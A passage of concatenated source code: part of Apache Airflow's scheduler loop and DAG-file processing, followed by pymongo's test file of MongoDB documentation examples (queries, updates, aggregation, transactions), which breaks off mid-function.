"exited with status %s for try_number %s",
dag_id, task_id, execution_date, state, try_number
)
if state == State.FAILED or state == State.SUCCESS:
qry = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date)
ti = qry.first()
if not ti:
self.log.warning("TaskInstance %s went missing from the database", ti)
continue
# TODO: should we fail RUNNING as well, as we do in Backfills?
if ti.try_number == try_number and ti.state == State.QUEUED:
msg = ("Executor reports task instance {} finished ({}) "
"although the task says its {}. Was the task "
"killed externally?".format(ti, state, ti.state))
self.log.error(msg)
try:
simple_dag = simple_dag_bag.get_dag(dag_id)
dagbag = models.DagBag(simple_dag.full_filepath)
dag = dagbag.get_dag(dag_id)
ti.task = dag.get_task(task_id)
ti.handle_failure(msg)
except Exception:
self.log.error("Cannot load the dag bag to handle failure for %s"
". Setting task to FAILED without callbacks or "
"retries. Do you have enough resources?", ti)
ti.state = State.FAILED
session.merge(ti)
session.commit()
def _execute(self):
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = False
if self.do_pickle and self.executor.__class__ not in \
(executors.LocalExecutor, executors.SequentialExecutor):
pickle_dags = True
self.log.info("Processing each file at most %s times", self.num_runs)
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self.subdir)
known_file_paths = list_py_file_paths(self.subdir)
self.log.info("There are %s files in %s", len(known_file_paths), self.subdir)
def processor_factory(file_path):
return DagFileProcessor(file_path,
pickle_dags,
self.dag_ids)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds = conf.getint('core', 'dagbag_import_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(self.subdir,
known_file_paths,
self.num_runs,
processor_factory,
processor_timeout,
async_mode)
try:
self._execute_helper()
except Exception:
self.log.exception("Exception when executing execute_helper")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
def _execute_helper(self):
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.reset_state_for_orphaned_tasks()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
# Last time that self.heartbeat() was called.
last_self_heartbeat_time = timezone.utcnow()
# For the execute duration, parse and schedule DAGs
while True:
self.log.debug("Starting Loop...")
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.heartbeat()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
self.log.debug("Harvesting DAG parsing results")
simple_dags = self.processor_agent.harvest_simple_dags()
self.log.debug("Harvested {} SimpleDAGs".format(len(simple_dags)))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(simple_dags)
if len(simple_dags) > 0:
try:
simple_dag_bag = SimpleDagBag(simple_dags)
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
self._execute_task_instances(simple_dag_bag,
(State.SCHEDULED,))
except Exception as e:
self.log.error("Error queuing tasks")
self.log.exception(e)
continue
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
# Heartbeat the scheduler periodically
time_since_last_heartbeat = (timezone.utcnow() -
last_self_heartbeat_time).total_seconds()
if time_since_last_heartbeat > self.heartrate:
self.log.debug("Heartbeating the scheduler")
self.heartbeat()
last_self_heartbeat_time = timezone.utcnow()
is_unit_test = conf.getboolean('core', 'unit_test_mode')
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug(
"Ran scheduling loop in %.2f seconds",
loop_duration)
if not is_unit_test:
self.log.debug("Sleeping for %.2f seconds", self._processor_poll_interval)
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info("Exiting scheduler loop as all files"
" have been processed {} times".format(self.num_runs))
break
if loop_duration < 1 and not is_unit_test:
sleep_length = 1 - loop_duration
self.log.debug(
"Sleeping for {0:.2f} seconds to prevent excessive logging"
.format(sleep_length))
sleep(sleep_length)
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove()
@provide_session
def process_file(self, file_path, pickle_dags=False, session=None):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: unicode
:param pickle_dags: whether serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:return: a list of SimpleDags made from the Dags found in the file
:rtype: list[airflow.utils.dag_processing.SimpleDagBag]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
# As DAGs are parsed from this file, they will be converted into SimpleDags
simple_dags = []
try:
dagbag = models.DagBag(file_path, include_examples=False)
except Exception:
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return []
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return []
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
for dag in dagbag.dags.values():
dag.sync_to_db()
paused_dag_ids = [dag.dag_id for dag in dagbag.dags.values()
if dag.is_paused]
# Pickle the DAGs (if necessary) and put them into a SimpleDag
for dag_id in dagbag.dags:
# Only return DAGs that are not paused
if dag_id not in paused_dag_ids:
dag = dagbag.get_dag(dag_id)
pickle_id = None
if pickle_dags:
pickle_id = dag.pickle(session).id
simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))
if len(self.dag_ids) > 0:
dags = [dag for dag in dagbag.dags.values()
if dag.dag_id in self.dag_ids and
dag.dag_id not in paused_dag_ids]
else:
dags = [dag for dag in dagbag.dags.values()
if not dag.parent_dag and
dag.dag_id not in paused_dag_ids]
# Not using multiprocessing.Queue() since it's no longer a separate
# process and due to some unusual behavior. (empty() incorrectly
# returns true as described in https://bugs.python.org/issue23582 )
ti_keys_to_schedule = []
self._process_dags(dagbag, dags, ti_keys_to_schedule)
for ti_key in ti_keys_to_schedule:
dag = dagbag.dags[ti_key[0]]
task = dag.get_task(ti_key[1])
ti = models.TaskInstance(task, ti_key[2])
ti.refresh_from_db(session=session, lock_for_update=True)
# We can defer checking the task dependency checks to the worker themselves
# since they can be expensive to run in the scheduler.
dep_context = DepContext(deps=QUEUE_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
# TODO(aoen): It's not great that we have to check all the task instance
# dependencies twice; once to get the task scheduled, and again to actually
# run the task. We should try to come up with a way to only check them once.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception:
self.log.exception("Error logging import errors!")
try:
dagbag.kill_zombies()
except Exception:
self.log.exception("Error killing zombies!")
return simple_dags
@provide_session
def heartbeat_callback(self, session=None):
Stats.incr('scheduler_heartbeat', 1, 1)
|
test_examples.py
|
# Copyright 2017 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MongoDB documentation examples in Python."""
import datetime
import sys
import threading
sys.path[0:0] = [""]
import pymongo
from pymongo.errors import ConnectionFailure, OperationFailure
from pymongo.read_concern import ReadConcern
from pymongo.read_preferences import ReadPreference
from pymongo.write_concern import WriteConcern
from test import client_context, unittest, IntegrationTest
from test.utils import rs_or_single_client
class TestSampleShellCommands(unittest.TestCase):
@classmethod
@client_context.require_connection
def setUpClass(cls):
cls.client = rs_or_single_client(w="majority")
# Run once before any tests run.
cls.client.pymongo_test.inventory.drop()
@classmethod
def tearDownClass(cls):
client_context.client.drop_database("pymongo_test")
def tearDown(self):
# Run after every test.
self.client.pymongo_test.inventory.drop()
def test_first_three_examples(self):
db = client_context.client.pymongo_test
# Start Example 1
db.inventory.insert_one(
{"item": "canvas",
"qty": 100,
"tags": ["cotton"],
"size": {"h": 28, "w": 35.5, "uom": "cm"}})
# End Example 1
self.assertEqual(db.inventory.count_documents({}), 1)
# Start Example 2
cursor = db.inventory.find({"item": "canvas"})
# End Example 2
self.assertEqual(cursor.count(), 1)
# Start Example 3
db.inventory.insert_many([
{"item": "journal",
"qty": 25,
"tags": ["blank", "red"],
"size": {"h": 14, "w": 21, "uom": "cm"}},
{"item": "mat",
"qty": 85,
"tags": ["gray"],
"size": {"h": 27.9, "w": 35.5, "uom": "cm"}},
{"item": "mousepad",
"qty": 25,
"tags": ["gel", "blue"],
"size": {"h": 19, "w": 22.85, "uom": "cm"}}])
# End Example 3
self.assertEqual(db.inventory.count_documents({}), 4)
def test_query_top_level_fields(self):
db = client_context.client.pymongo_test
# Start Example 6
db.inventory.insert_many([
{"item": "journal",
"qty": 25,
"size": {"h": 14, "w": 21, "uom": "cm"},
"status": "A"},
{"item": "notebook",
"qty": 50,
"size": {"h": 8.5, "w": 11, "uom": "in"},
"status": "A"},
{"item": "paper",
"qty": 100,
"size": {"h": 8.5, "w": 11, "uom": "in"},
"status": "D"},
{"item": "planner",
"qty": 75, "size": {"h": 22.85, "w": 30, "uom": "cm"},
"status": "D"},
{"item": "postcard",
"qty": 45,
"size": {"h": 10, "w": 15.25, "uom": "cm"},
"status": "A"}])
# End Example 6
self.assertEqual(db.inventory.count_documents({}), 5)
# Start Example 7
cursor = db.inventory.find({})
# End Example 7
self.assertEqual(len(list(cursor)), 5)
# Start Example 9
cursor = db.inventory.find({"status": "D"})
# End Example 9
self.assertEqual(len(list(cursor)), 2)
# Start Example 10
cursor = db.inventory.find({"status": {"$in": ["A", "D"]}})
# End Example 10
self.assertEqual(len(list(cursor)), 5)
# Start Example 11
cursor = db.inventory.find({"status": "A", "qty": {"$lt": 30}})
# End Example 11
self.assertEqual(len(list(cursor)), 1)
# Start Example 12
cursor = db.inventory.find(
{"$or": [{"status": "A"}, {"qty": {"$lt": 30}}]})
# End Example 12
self.assertEqual(len(list(cursor)), 3)
# Start Example 13
cursor = db.inventory.find({
"status": "A",
"$or": [{"qty": {"$lt": 30}}, {"item": {"$regex": "^p"}}]})
# End Example 13
self.assertEqual(len(list(cursor)), 2)
def test_query_embedded_documents(self):
db = client_context.client.pymongo_test
# Start Example 14
# Subdocument key order matters in a few of these examples so we have
# to use bson.son.SON instead of a Python dict.
from bson.son import SON
db.inventory.insert_many([
{"item": "journal",
"qty": 25,
"size": SON([("h", 14), ("w", 21), ("uom", "cm")]),
"status": "A"},
{"item": "notebook",
"qty": 50,
"size": SON([("h", 8.5), ("w", 11), ("uom", "in")]),
"status": "A"},
{"item": "paper",
"qty": 100,
"size": SON([("h", 8.5), ("w", 11), ("uom", "in")]),
"status": "D"},
{"item": "planner",
"qty": 75,
"size": SON([("h", 22.85), ("w", 30), ("uom", "cm")]),
"status": "D"},
{"item": "postcard",
"qty": 45,
"size": SON([("h", 10), ("w", 15.25), ("uom", "cm")]),
"status": "A"}])
# End Example 14
# Start Example 15
cursor = db.inventory.find(
{"size": SON([("h", 14), ("w", 21), ("uom", "cm")])})
# End Example 15
self.assertEqual(len(list(cursor)), 1)
# Start Example 16
cursor = db.inventory.find(
{"size": SON([("w", 21), ("h", 14), ("uom", "cm")])})
# End Example 16
self.assertEqual(len(list(cursor)), 0)
# Start Example 17
cursor = db.inventory.find({"size.uom": "in"})
# End Example 17
self.assertEqual(len(list(cursor)), 2)
# Start Example 18
cursor = db.inventory.find({"size.h": {"$lt": 15}})
# End Example 18
self.assertEqual(len(list(cursor)), 4)
# Start Example 19
cursor = db.inventory.find(
{"size.h": {"$lt": 15}, "size.uom": "in", "status": "D"})
# End Example 19
self.assertEqual(len(list(cursor)), 1)
def test_query_arrays(self):
db = client_context.client.pymongo_test
# Start Example 20
db.inventory.insert_many([
{"item": "journal",
"qty": 25,
"tags": ["blank", "red"],
"dim_cm": [14, 21]},
{"item": "notebook",
"qty": 50,
"tags": ["red", "blank"],
"dim_cm": [14, 21]},
{"item": "paper",
"qty": 100,
"tags": ["red", "blank", "plain"],
"dim_cm": [14, 21]},
{"item": "planner",
"qty": 75,
"tags": ["blank", "red"],
"dim_cm": [22.85, 30]},
{"item": "postcard",
"qty": 45,
"tags": ["blue"],
"dim_cm": [10, 15.25]}])
# End Example 20
# Start Example 21
cursor = db.inventory.find({"tags": ["red", "blank"]})
# End Example 21
self.assertEqual(len(list(cursor)), 1)
# Start Example 22
cursor = db.inventory.find({"tags": {"$all": ["red", "blank"]}})
# End Example 22
self.assertEqual(len(list(cursor)), 4)
# Start Example 23
cursor = db.inventory.find({"tags": "red"})
# End Example 23
self.assertEqual(len(list(cursor)), 4)
# Start Example 24
cursor = db.inventory.find({"dim_cm": {"$gt": 25}})
# End Example 24
self.assertEqual(len(list(cursor)), 1)
# Start Example 25
cursor = db.inventory.find({"dim_cm": {"$gt": 15, "$lt": 20}})
# End Example 25
self.assertEqual(len(list(cursor)), 4)
# Start Example 26
cursor = db.inventory.find(
{"dim_cm": {"$elemMatch": {"$gt": 22, "$lt": 30}}})
# End Example 26
self.assertEqual(len(list(cursor)), 1)
# Start Example 27
cursor = db.inventory.find({"dim_cm.1": {"$gt": 25}})
# End Example 27
self.assertEqual(len(list(cursor)), 1)
# Start Example 28
cursor = db.inventory.find({"tags": {"$size": 3}})
# End Example 28
self.assertEqual(len(list(cursor)), 1)
def test_query_array_of_documents(self):
db = client_context.client.pymongo_test
# Start Example 29
# Subdocument key order matters in a few of these examples so we have
# to use bson.son.SON instead of a Python dict.
from bson.son import SON
db.inventory.insert_many([
{"item": "journal",
"instock": [
SON([("warehouse", "A"), ("qty", 5)]),
SON([("warehouse", "C"), ("qty", 15)])]},
{"item": "notebook",
"instock": [
SON([("warehouse", "C"), ("qty", 5)])]},
{"item": "paper",
"instock": [
SON([("warehouse", "A"), ("qty", 60)]),
SON([("warehouse", "B"), ("qty", 15)])]},
{"item": "planner",
"instock": [
SON([("warehouse", "A"), ("qty", 40)]),
SON([("warehouse", "B"), ("qty", 5)])]},
{"item": "postcard",
"instock": [
SON([("warehouse", "B"), ("qty", 15)]),
SON([("warehouse", "C"), ("qty", 35)])]}])
# End Example 29
# Start Example 30
cursor = db.inventory.find(
{"instock": SON([("warehouse", "A"), ("qty", 5)])})
# End Example 30
self.assertEqual(len(list(cursor)), 1)
# Start Example 31
cursor = db.inventory.find(
{"instock": SON([("qty", 5), ("warehouse", "A")])})
# End Example 31
self.assertEqual(len(list(cursor)), 0)
# Start Example 32
cursor = db.inventory.find({'instock.0.qty': {"$lte": 20}})
# End Example 32
self.assertEqual(len(list(cursor)), 3)
# Start Example 33
cursor = db.inventory.find({'instock.qty': {"$lte": 20}})
# End Example 33
self.assertEqual(len(list(cursor)), 5)
# Start Example 34
cursor = db.inventory.find(
{"instock": {"$elemMatch": {"qty": 5, "warehouse": "A"}}})
# End Example 34
self.assertEqual(len(list(cursor)), 1)
# Start Example 35
cursor = db.inventory.find(
{"instock": {"$elemMatch": {"qty": {"$gt": 10, "$lte": 20}}}})
# End Example 35
self.assertEqual(len(list(cursor)), 3)
# Start Example 36
cursor = db.inventory.find({"instock.qty": {"$gt": 10, "$lte": 20}})
# End Example 36
self.assertEqual(len(list(cursor)), 4)
# Start Example 37
cursor = db.inventory.find(
{"instock.qty": 5, "instock.warehouse": "A"})
# End Example 37
self.assertEqual(len(list(cursor)), 2)
def test_query_null(self):
db = client_context.client.pymongo_test
# Start Example 38
db.inventory.insert_many([{"_id": 1, "item": None}, {"_id": 2}])
# End Example 38
# Start Example 39
cursor = db.inventory.find({"item": None})
# End Example 39
self.assertEqual(len(list(cursor)), 2)
# Start Example 40
cursor = db.inventory.find({"item": {"$type": 10}})
# End Example 40
self.assertEqual(len(list(cursor)), 1)
# Start Example 41
cursor = db.inventory.find({"item": {"$exists": False}})
# End Example 41
self.assertEqual(len(list(cursor)), 1)
def test_projection(self):
db = client_context.client.pymongo_test
# Start Example 42
db.inventory.insert_many([
{"item": "journal",
"status": "A",
"size": {"h": 14, "w": 21, "uom": "cm"},
"instock": [{"warehouse": "A", "qty": 5}]},
{"item": "notebook",
"status": "A",
"size": {"h": 8.5, "w": 11, "uom": "in"},
"instock": [{"warehouse": "C", "qty": 5}]},
{"item": "paper",
"status": "D",
"size": {"h": 8.5, "w": 11, "uom": "in"},
"instock": [{"warehouse": "A", "qty": 60}]},
{"item": "planner",
"status": "D",
"size": {"h": 22.85, "w": 30, "uom": "cm"},
"instock": [{"warehouse": "A", "qty": 40}]},
{"item": "postcard",
"status": "A",
"size": {"h": 10, "w": 15.25, "uom": "cm"},
"instock": [
{"warehouse": "B", "qty": 15},
{"warehouse": "C", "qty": 35}]}])
# End Example 42
# Start Example 43
cursor = db.inventory.find({"status": "A"})
# End Example 43
self.assertEqual(len(list(cursor)), 3)
# Start Example 44
cursor = db.inventory.find(
{"status": "A"}, {"item": 1, "status": 1})
# End Example 44
for doc in cursor:
self.assertTrue("_id" in doc)
self.assertTrue("item" in doc)
self.assertTrue("status" in doc)
self.assertFalse("size" in doc)
self.assertFalse("instock" in doc)
# Start Example 45
cursor = db.inventory.find(
{"status": "A"}, {"item": 1, "status": 1, "_id": 0})
# End Example 45
for doc in cursor:
self.assertFalse("_id" in doc)
self.assertTrue("item" in doc)
self.assertTrue("status" in doc)
self.assertFalse("size" in doc)
self.assertFalse("instock" in doc)
# Start Example 46
cursor = db.inventory.find(
{"status": "A"}, {"status": 0, "instock": 0})
# End Example 46
for doc in cursor:
self.assertTrue("_id" in doc)
self.assertTrue("item" in doc)
self.assertFalse("status" in doc)
self.assertTrue("size" in doc)
self.assertFalse("instock" in doc)
# Start Example 47
cursor = db.inventory.find(
{"status": "A"}, {"item": 1, "status": 1, "size.uom": 1})
# End Example 47
for doc in cursor:
self.assertTrue("_id" in doc)
self.assertTrue("item" in doc)
self.assertTrue("status" in doc)
self.assertTrue("size" in doc)
self.assertFalse("instock" in doc)
size = doc['size']
self.assertTrue('uom' in size)
self.assertFalse('h' in size)
self.assertFalse('w' in size)
# Start Example 48
cursor = db.inventory.find({"status": "A"}, {"size.uom": 0})
# End Example 48
for doc in cursor:
self.assertTrue("_id" in doc)
self.assertTrue("item" in doc)
self.assertTrue("status" in doc)
self.assertTrue("size" in doc)
self.assertTrue("instock" in doc)
size = doc['size']
self.assertFalse('uom' in size)
self.assertTrue('h' in size)
self.assertTrue('w' in size)
# Start Example 49
cursor = db.inventory.find(
{"status": "A"}, {"item": 1, "status": 1, "instock.qty": 1})
# End Example 49
for doc in cursor:
self.assertTrue("_id" in doc)
self.assertTrue("item" in doc)
self.assertTrue("status" in doc)
self.assertFalse("size" in doc)
self.assertTrue("instock" in doc)
for subdoc in doc['instock']:
self.assertFalse('warehouse' in subdoc)
self.assertTrue('qty' in subdoc)
# Start Example 50
cursor = db.inventory.find(
{"status": "A"},
{"item": 1, "status": 1, "instock": {"$slice": -1}})
# End Example 50
for doc in cursor:
self.assertTrue("_id" in doc)
self.assertTrue("item" in doc)
self.assertTrue("status" in doc)
self.assertFalse("size" in doc)
self.assertTrue("instock" in doc)
self.assertEqual(len(doc["instock"]), 1)
def test_update_and_replace(self):
db = client_context.client.pymongo_test
# Start Example 51
db.inventory.insert_many([
{"item": "canvas",
"qty": 100,
"size": {"h": 28, "w": 35.5, "uom": "cm"},
"status": "A"},
{"item": "journal",
"qty": 25,
"size": {"h": 14, "w": 21, "uom": "cm"},
"status": "A"},
{"item": "mat",
"qty": 85,
"size": {"h": 27.9, "w": 35.5, "uom": "cm"},
"status": "A"},
{"item": "mousepad",
"qty": 25,
"size": {"h": 19, "w": 22.85, "uom": "cm"},
"status": "P"},
{"item": "notebook",
"qty": 50,
"size": {"h": 8.5, "w": 11, "uom": "in"},
"status": "P"},
{"item": "paper",
"qty": 100,
"size": {"h": 8.5, "w": 11, "uom": "in"},
"status": "D"},
{"item": "planner",
"qty": 75,
"size": {"h": 22.85, "w": 30, "uom": "cm"},
"status": "D"},
{"item": "postcard",
"qty": 45,
"size": {"h": 10, "w": 15.25, "uom": "cm"},
"status": "A"},
{"item": "sketchbook",
"qty": 80,
"size": {"h": 14, "w": 21, "uom": "cm"},
"status": "A"},
{"item": "sketch pad",
"qty": 95,
"size": {"h": 22.85, "w": 30.5, "uom": "cm"},
"status": "A"}])
# End Example 51
# Start Example 52
db.inventory.update_one(
{"item": "paper"},
{"$set": {"size.uom": "cm", "status": "P"},
"$currentDate": {"lastModified": True}})
# End Example 52
for doc in db.inventory.find({"item": "paper"}):
self.assertEqual(doc["size"]["uom"], "cm")
self.assertEqual(doc["status"], "P")
self.assertTrue("lastModified" in doc)
# Start Example 53
db.inventory.update_many(
{"qty": {"$lt": 50}},
{"$set": {"size.uom": "in", "status": "P"},
"$currentDate": {"lastModified": True}})
# End Example 53
for doc in db.inventory.find({"qty": {"$lt": 50}}):
self.assertEqual(doc["size"]["uom"], "in")
self.assertEqual(doc["status"], "P")
self.assertTrue("lastModified" in doc)
# Start Example 54
db.inventory.replace_one(
{"item": "paper"},
{"item": "paper",
"instock": [
{"warehouse": "A", "qty": 60},
{"warehouse": "B", "qty": 40}]})
# End Example 54
for doc in db.inventory.find({"item": "paper"}, {"_id": 0}):
self.assertEqual(len(doc.keys()), 2)
self.assertTrue("item" in doc)
self.assertTrue("instock" in doc)
self.assertEqual(len(doc["instock"]), 2)
def test_delete(self):
db = client_context.client.pymongo_test
# Start Example 55
db.inventory.insert_many([
{"item": "journal",
"qty": 25,
"size": {"h": 14, "w": 21, "uom": "cm"},
"status": "A"},
{"item": "notebook",
"qty": 50,
"size": {"h": 8.5, "w": 11, "uom": "in"},
"status": "P"},
{"item": "paper",
"qty": 100,
"size": {"h": 8.5, "w": 11, "uom": "in"},
"status": "D"},
{"item": "planner",
"qty": 75,
"size": {"h": 22.85, "w": 30, "uom": "cm"},
"status": "D"},
{"item": "postcard",
"qty": 45,
"size": {"h": 10, "w": 15.25, "uom": "cm"},
"status": "A"}])
# End Example 55
self.assertEqual(db.inventory.count_documents({}), 5)
# Start Example 57
db.inventory.delete_many({"status": "A"})
# End Example 57
self.assertEqual(db.inventory.count_documents({}), 3)
# Start Example 58
db.inventory.delete_one({"status": "D"})
# End Example 58
self.assertEqual(db.inventory.count_documents({}), 2)
# Start Example 56
db.inventory.delete_many({})
# End Example 56
self.assertEqual(db.inventory.count_documents({}), 0)
@client_context.require_version_min(3, 5, 11)
@client_context.require_replica_set
@client_context.require_no_mmap
def test_change_streams(self):
db = client_context.client.pymongo_test
done = False
def insert_docs():
while not done:
db.inventory.insert_one({"username": "alice"})
db.inventory.delete_one({"username": "alice"})
t = threading.Thread(target=insert_docs)
t.start()
try:
# 1. The database for reactive, real-time applications
# Start Changestream Example 1
cursor = db.inventory.watch()
document = next(cursor)
# End Changestream Example 1
# Start Changestream Example 2
cursor = db.inventory.watch(full_document='updateLookup')
document = next(cursor)
# End Changestream Example 2
# Start Changestream Example 3
resume_token = cursor.resume_token
cursor = db.inventory.watch(resume_after=resume_token)
document = next(cursor)
# End Changestream Example 3
# Start Changestream Example 4
pipeline = [
{'$match': {'fullDocument.username': 'alice'}},
{'$addFields': {'newField': 'this is an added field!'}}
]
cursor = db.inventory.watch(pipeline=pipeline)
document = next(cursor)
# End Changestream Example 4
finally:
done = True
t.join()
def test_aggregate_examples(self):
db = client_context.client.pymongo_test
# Start Aggregation Example 1
db.sales.aggregate([
{"$match": {"items.fruit": "banana"}},
{"$sort": {"date": 1}}
])
# End Aggregation Example 1
# Start Aggregation Example 2
db.sales.aggregate([
{"$unwind": "$items"},
{"$match": {"items.fruit": "banana"}},
{"$group": {
"_id": {"day": {"$dayOfWeek": "$date"}},
"count": {"$sum": "$items.quantity"}}
},
{"$project": {
"dayOfWeek": "$_id.day",
"numberSold": "$count",
"_id": 0}
},
{"$sort": {"numberSold": 1}}
])
# End Aggregation Example 2
# Start Aggregation Example 3
db.sales.aggregate([
{"$unwind": "$items"},
{"$group": {
"_id": {"day": {"$dayOfWeek": "$date"}},
"items_sold": {"$sum": "$items.quantity"},
"revenue": {
"$sum": {
"$multiply": [
"$items.quantity", "$items.price"]
}
}
}
},
{"$project": {
"day": "$_id.day",
"revenue": 1,
"items_sold": 1,
"discount": {
"$cond": {
"if": {"$lte": ["$revenue", 250]},
"then": 25,
"else": 0
}
}
}
}
])
# End Aggregation Example 3
# $lookup was new in 3.2. The let and pipeline options
# were added in 3.6.
if client_context.version.at_least(3, 6, 0):
# Start Aggregation Example 4
db.air_alliances.aggregate([
{"$lookup": {
"from": "air_airlines",
"let": {"constituents": "$airlines"},
"pipeline": [
{"$match": {"$expr": {"$in": ["$name", "$$constituents"]}}}
],
"as": "airlines"
}
},
{"$project": {
"_id": 0,
"name": 1,
"airlines": {
"$filter": {
"input": "$airlines",
"as": "airline",
"cond": {"$eq": ["$$airline.country", "Canada"]}
}
}
}
}
])
# End Aggregation Example 4
def test_commands(self):
db = client_context.client.pymongo_test
db.restaurants.insert_one({})
# Start runCommand Example 1
db.command("buildInfo")
# End runCommand Example 1
# Start runCommand Example 2
db.command("collStats", "restaurants")
# End runCommand Example 2
def test_index_management(self):
db = client_context.client.pymongo_test
# Start Index Example 1
db.records.create_index("score")
# End Index Example 1
# Start Index Example 1
db.restaurants.create_index(
[("cuisine", pymongo.ASCENDING), ("name", pymongo.ASCENDING)],
partialFilterExpression={"rating": {"$gt": 5}}
)
# End Index Example 1
@client_context.require_version_min(3, 6, 0)
@client_context.require_replica_set
def test_misc(self):
# Marketing examples
client = client_context.client
self.addCleanup(client.drop_database, "test")
self.addCleanup(client.drop_database, "my_database")
# 2. Tunable consistency controls
collection = client.my_database.my_collection
with client.start_session() as session:
collection.insert_one({'_id': 1}, session=session)
collection.update_one(
{'_id': 1}, {"$set": {"a": 1}}, session=session)
for doc in collection.find({}, session=session):
pass
# 3. Exploiting the power of arrays
collection = client.test.array_updates_test
collection.update_one(
{'_id': 1},
{"$set": {"a.$[i].b": 2}},
array_filters=[{"i.b": 0}])
class TestTransactionExamples(IntegrationTest):
@classmethod
@client_context.require_connection
def setUpClass(cls):
super(TestTransactionExamples, cls).setUpClass()
cls.client = rs_or_single_client(w="majority")
@client_context.require_transactions
def test_transactions(self):
# Transaction examples
client = self.client
self.addCleanup(client.drop_database, "hr")
self.addCleanup(client.drop_database, "reporting")
employees = client.hr.employees
events = client.reporting.events
employees.insert_one({"employee": 3, "status": "Active"})
events.insert_one(
{"employee": 3, "status": {"new": "Active", "old": None}})
# Start Transactions Intro Example 1
def update_employee_info(session):
employees_coll = session.client.hr.employees
events_coll = session.client.reporting.events
with session.start_transaction(
read_concern=ReadConcern("snapshot"),
write_concern=WriteConcern(w="majority")):
employees_coll.update_one(
{"employee": 3}, {"$set": {"status": "Inactive"}},
session=session)
events_coll.insert_one(
{"employee": 3, "status": {
"new": "Inactive", "old": "Active"}},
session=session)
while True:
try:
# Commit uses write concern set at transaction start.
session.commit_transaction()
print("Transaction committed.")
break
except (ConnectionFailure, OperationFailure) as exc:
# Can retry commit
if exc.has_error_label(
"UnknownTransactionCommitResult"):
print("UnknownTransactionCommitResult, retrying "
"commit operation ...")
continue
else:
print("Error during commit ...")
raise
# End Transactions Intro Example 1
with client.start_session() as session:
update_employee_info(session)
employee = employees.find_one({"employee": 3})
self.assertIsNotNone(employee)
self.assertEqual(employee['status'], 'Inactive')
# Start Transactions Retry Example 1
def run_transaction_with_retry(txn_func, session):
while True:
try:
txn_func(session) # performs transaction
break
except (ConnectionFailure, OperationFailure) as exc:
print("Transaction aborted. Caught exception during "
"transaction.")
# If transient error, retry the whole transaction
if exc.has_error_label("TransientTransactionError"):
